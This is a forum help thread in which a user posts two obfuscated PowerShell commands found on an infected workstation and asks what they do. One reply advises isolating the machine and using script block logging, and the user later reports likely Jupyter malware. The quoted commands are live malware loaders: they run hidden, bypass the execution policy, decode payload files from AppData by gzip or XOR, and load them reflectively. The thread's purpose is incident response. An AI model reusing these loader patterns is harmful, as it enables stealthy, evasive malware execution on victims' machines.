Unknow Script in our Environment

We detected the scripts below on one of our computers this morning. I’m pretty sure they are malicious based on how they look and what they appear to be doing. The folders they reference contain dozens of files with random file names and extensions. They also appear to be tied to some startup process or program.

Where I fall short is understanding what these scripts are actually doing and I’m hoping I can get some help. I understand that the scripts are running as hidden, setting the execution policy as bypass, and then calling a script block. After that it seems to either call, create, or manipulate objects and then connecting to files.

“PowerShell.exe” -windOWStYLe hIddEN -eP BYpASs -commAnD “[sYsTem.refLEcTion.ASsEmBly]::LoAD({$a7118bfda6d4b8af0cb14447ec219=NEW-ObJeCt SYStEm.IO.MEMorySTreAm(, $ArGS[0]);$abab1a4d8b348e881f740374eb4eb=neW-oBject SystEM.IO.mEmoRYsTReAM;$a41c73041894c69d901cdb652dcd8=NeW-oBjeCT SYSteM.IO.cOmPRESsIOn.gZipstrEAM $a7118bfda6d4b8af0cb14447ec219, ([IO.COmprESsIon.comPReSSioNmODE]::DecOmPrEss);$a41c73041894c69d901cdb652dcd8.coPyTO($abab1a4d8b348e881f740374eb4eb);$a41c73041894c69d901cdb652dcd8.CLose();$a7118bfda6d4b8af0cb14447ec219.CLOse();reTuRN $abab1a4d8b348e881f740374eb4eb.toaRRay();}.inVoKE([SYsteM.Io.fiLE]::REadALlByteS(‘C:\Users\jdoe\AppData\Roaming\aDobe\TefpYOdEvcLAk\ZeoLwxHmUPAuRViqY.MiOzuJQlZGYeaEq’)));[abe9358f57541eab841f83b9a944d.a3e8233974540f924b73c817a287c]::ac7f32ed5624da88d2fee302b2b18()”

“PowerShell.exe” -wINDoWStYLe hIDDEN -eP BypasS -comMand “$a7997fcd41e4a3b768a6bf953e6cc=‘QHJTM01eTkBtP0B8S3M2Xm81WUpAUzImMUB7Nk9oXlBqKGhAcjl3OV4wS09mQHZnWHVAd0teKUB0JV5QXlBqZXhAVU19Y0B1LUg3QFY+ZDBeMHVfUS0/O0ZzdyFpWVVxQE1Ad2tZbkB3fmpHPlg0ZkFnU0BFb3NHKitvbVotaC1rQ1REKG9QZVY2bld2UVN4fllmamdOKld6eHhlT3luZWVga3JTcTFkd2VxeChqUGpEQnFWbHgwal97a2p5entTdmxKS2pLeEFCXnJoVnpHIW9BWiYwelc=’;$a77abf52b7d407808df1ba9745490=[sySTEm.IO.filE]::rEAdALLbytES(‘C:\Users\jdoe\AppData\Roaming\mIcROSoFt\YOSEmKhDtVvawIMuCQk\dZBIhKAtEGYsg.qNyFOJtMwvWmEfZ’);fOr($aa9ae30d8304f0b78e86582ea3b85=0;$aa9ae30d8304f0b78e86582ea3b85 -Lt $a77abf52b7d407808df1ba9745490.COUNT;){FOr($a439a9ddd664bfbdee23d2c082e8b=0;$a439a9ddd664bfbdee23d2c082e8b -lT $a7997fcd41e4a3b768a6bf953e6cc.lEnGtH;$a439a9ddd664bfbdee23d2c082e8b++){$a77abf52b7d407808df1ba9745490[$aa9ae30d8304f0b78e86582ea3b85]=$a77abf52b7d407808df1ba9745490[$aa9ae30d8304f0b78e86582ea3b85] -BXoR $a7997fcd41e4a3b768a6bf953e6cc[$a439a9ddd664bfbdee23d2c082e8b];$aa9ae30d8304f0b78e86582ea3b85++;IF($aa9ae30d8304f0b78e86582ea3b85 -ge $a77abf52b7d407808df1ba9745490.cOuNT){$a439a9ddd664bfbdee23d2c082e8b=$a7997fcd41e4a3b768a6bf953e6cc.LengTH}}};[SYSTem.ReFlectIOn.aSsEmbLY]::loaD($a77abf52b7d407808df1ba9745490);[aa1d6f4e60d4f0b9a10f9031f4877.af35bb34041454ba3d18c1a462992]::a2be604cdf64df868f7a43ea5911b()”

Any help would be appreciated,
James

James,
Welcome to the forum.

I assume you’ve already separated the computer you’ve found these scripts on from your network!? If you not you should do now.

An easy way to get what those obfuscated code does is by enabling PowerShell script block logging and running it.

Here are some blog posts or documentation pages according to this topic

Hunting for Malicious PowerShell using Script Block Logging | Splunk.

We ended up finding that this was caused by malware, potentially Jupyter. Needless to say the PC has been cleaned and I have a new favorite user.